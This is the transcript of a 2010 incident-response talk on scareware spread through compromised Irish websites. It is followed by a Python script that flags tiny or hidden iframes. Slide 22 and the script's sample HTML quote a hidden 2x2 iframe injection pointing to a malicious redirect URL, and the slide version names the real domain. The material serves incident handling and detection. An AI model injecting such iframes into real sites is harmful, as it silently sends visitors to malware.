Scareware Traversing the World via Ireland

As a volunteer handler for IrissCert, I was notified of several Irish websites being compromised and containing malicious code. The presentation covers the investigation and incident handling process followed.

Published in: Technology, News & Politics

Transcript of "Scareware Traversing the World via Ireland"

  1. Scareware Traversing the World via an Irish Web Exploit. Mark Hillick (@markofu), IrissCert Incident Handler. Friday 17 September 2010
  2. Presentations: 99%
  3. Ireland
  4. Ireland: CSIRT/CERT?
  5. Europe
  6. Introducing IRISS: Volunteer handlers; Local Security Professionals; Weekly handler shifts; Not-for-profit organization
  7. What do we see?
  8. How do users feel? 2/3 have been victims; < 10% feel very safe; 97% expect to be victims; Law Enforcement & Businesses lack resources
  9. Why we’re here!
  10. ALERTS: IRISS custom
  11. Scareware
  12. $$$$: FBI -> $150 million
  13. How easy? Very :-(
  14. Growth
  15. Scareware Evolving
  16. Remember: Zen and the art of incident handling ...
  17. Reactions
  18. Reactions
  19. Reactions
  20. Identification: Gather information; Analysis; Determine
  21. Identification - Vector: Legitimate Websites
  22. Identification - WA: Not visible; iframe injection • <iframe frameborder = 0 height = 2 width = 2 src ="http://jobstopfil.biz/tds_a/go.php/go.php?id=4" /></body>
  23. Identification - iframe
  24. Identification - WA: DNS requests; HTTP • Gets • Posts; Scripts
  25. Identification - SW
  26. Identification - SW
  27. Identification - SW
  28. Identification - SW
  29. Identification - Analysis: Exploited Sites hosted on one server; Weak FTP passwords (e.g. Ghost61); Two most popular web site attacks – • Gumblar - PHP Sites • Asprox - SQL Injection
  30. Containment: Verify; Stop the Spread • Remove • Notify • Inform; Blackhole. Source: Profound Whatever - Flickr Creative Commons
  31. Eradication: Remove; Improve; Vulnerability Analysis; Restore
  32. Eradication - How?
  33. Eradication - Hosting: Struggle but...
  34. Recovery. Source: Dilbert ©2009, United Feature Syndicate, Inc.
  35. Recovery - Be Sure! Validate, Restore & Monitor
  36. Lessons Learned
  37. Lessons Learned: Things required for an IR plan - • IR Team • Contact List • Regular Reviews • Escalation Process
  38. Lessons Learned: Awareness; Back-up & test the restore ;-); Patch; Test website for vulnerabilities & exploits; Defence-in-depth; Free Local & Online tools for safer browsing & analysis
  39. Lessons Learned: “A website must be able to protect itself from a hostile browser and a browser must be able to protect itself from a hostile website” - Jeremiah Grossman (Feb. 2010)
  40. Lessons Learned - Prep: Fail to Prepare, well you know the rest :)
  41. Scareware Evolution. Source: http://www.f-secure.com
  42. What do you use?
  43. Thank you very much (“go raibh míle maith agat”). Twitter: @markofu, @irisscert, @hackeire, #irisscon. Google-Fu: “scareware site:sans.org”. Unless stated, source of images -> Flickr Creative Commons, iStockPhoto or my own!!
  44. Well......
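Slide 22 shows the identification signature the handlers were looking for: a 2x2, borderless iframe appended just before </body>, with its src pointing off-site. The following Python check is an added example, not code from the talk or from IRISS; it is the kind of triage a site owner or handler could run over pages pulled from a web root (the slide-29 finding was that the compromised sites shared one server) to list iframes that are tiny or hidden by CSS and note when their src host is not the site's own. It uses only the standard library. The sample HTML is constructed to mirror the slide's snippet, and the host malicious.example is a placeholder, not the domain from the incident.

```python
"""Flag tiny or hidden iframes in HTML, the injection pattern shown on slide 22."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (not from the incident): the site's own legitimate frame plus
# a 2x2, borderless iframe appended just before </body>, written with the same
# loose "attr = value" spacing as the slide. "malicious.example" is a placeholder.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="http://www.example.com/widget" width="300" height="200"></iframe>
<iframe frameborder = 0 height = 2 width = 2 src ="http://malicious.example/tds_a/go.php?id=4" /></body></html>"""

TINY_PX = 10  # a frame this small or smaller is effectively invisible to the visitor


def _px(value):
    """Parse a width/height attribute ("2", "2px", " 2 ") into an int, or None."""
    if value is None:
        return None
    digits = value.strip().rstrip("px").strip()
    return int(digits) if digits.isdigit() else None


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe>, including self-closing ones."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lower-cases attribute names and strips the quotes;
        # a self-closing "<iframe ... />" is routed here via handle_startendtag.
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def suspicious_iframes(html, site_host):
    """Return [(src, reasons)] for each iframe that is tiny or hidden by CSS.

    site_host is the hostname the page legitimately lives on; an off-site src
    on a flagged frame is added as an extra reason so the analyst sees the
    redirect target at a glance.
    """
    parser = IframeCollector()
    parser.feed(html)
    parser.close()

    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        reasons = []

        width, height = _px(attrs.get("width")), _px(attrs.get("height"))
        if (width is not None and width <= TINY_PX) or (height is not None and height <= TINY_PX):
            reasons.append(f"tiny ({width}x{height})")

        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")

        host = urlparse(src).hostname or ""
        offsite = bool(host) and host != site_host and not host.endswith("." + site_host)
        if reasons and offsite:
            reasons.append(f"off-site src host {host}")

        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_HTML, "www.example.com"):
        print(f"{src}: {', '.join(reasons)}")
```

Run it over every HTML and PHP template in the document root and diff the output against a known-good copy; a hit names the frame's src and why it was flagged. Treat it as triage rather than a verdict: tracking pixels and some analytics embeds are also tiny, so the off-site host is the detail to check, and a clean result does not rule out the script-based injections slide 24 lists (HTTP GETs/POSTs and scripts), which need the DNS and HTTP review the slide describes.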
